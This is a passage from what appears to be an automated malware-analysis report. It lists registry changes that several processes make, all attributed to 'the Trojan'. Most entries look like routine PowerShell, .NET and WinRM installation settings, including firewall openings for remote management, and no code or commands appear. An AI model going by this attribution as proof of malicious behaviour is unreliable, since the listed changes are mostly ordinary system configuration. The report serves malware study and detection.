"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F2 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F0 00 00 00 53 00 79"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 F9 76 A4 2A A5 32 61 26 1C E2 5C 98 E3 ED C6"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
"ImageList" = "01 00 00 00 00 02 00 00 00 FC 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

The process mscorsvw.exe:2412 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 B2 1F 53 3D D3 21 1A 1C 8D 5F B1 30 12 E5 2B"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2064 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"SIG" = "65 39 A0 50 E9 4F 14 4B 85 A8 07 D9 00 B9 C9 79"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"LastModTime" = "B0 2A 7B 97 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"MVID" = "B1 10 6C EC A9 F5 C8 9E A5 7E 9E CD 46 C7 CF 57"
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F F7 85 91 F8 72 08 41 B4 A7 81 57 FD D1 7F 71"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "99"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"LastModTime" = "B8 D9 AA 97 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"SIG" = "EC D0 CD 16 68 09 9B 47 85 11 78 36 0F BB 3D 11"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]

The process wsmanhttpconfig.exe:2848 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 1E FB 99 AB D1 98 5B F1 41 E5 F0 A0 C2 95 61"

The process wsmanhttpconfig.exe:2452 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 3B F3 8E 75 9B 4E 52 64 19 29 DE 18 03 55 E4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "70E26930-EA82-4196-BBE8-84FEE19388CD"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""

The process MsiExec.exe:3168 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 BC 39 50 6E 71 2E BE A4 74 B8 26 91 7D 39 1D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process MsiExec.exe:2812 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 39 89 31 3A 89 13 A9 6A 20 A8 B2 A1 E1 EE E7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:1328 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 89 FC 43 8E 85 87 7F 91 15 F6 43 7A C1 10 CC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2.tmp\mastermind\,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process update.exe:3572 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"

[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"

[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"

[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"

[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"

[HKCR\.ps1xml]
"PerceivedType" = "Text"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"UpgradeType" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"

[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"

[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"

[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
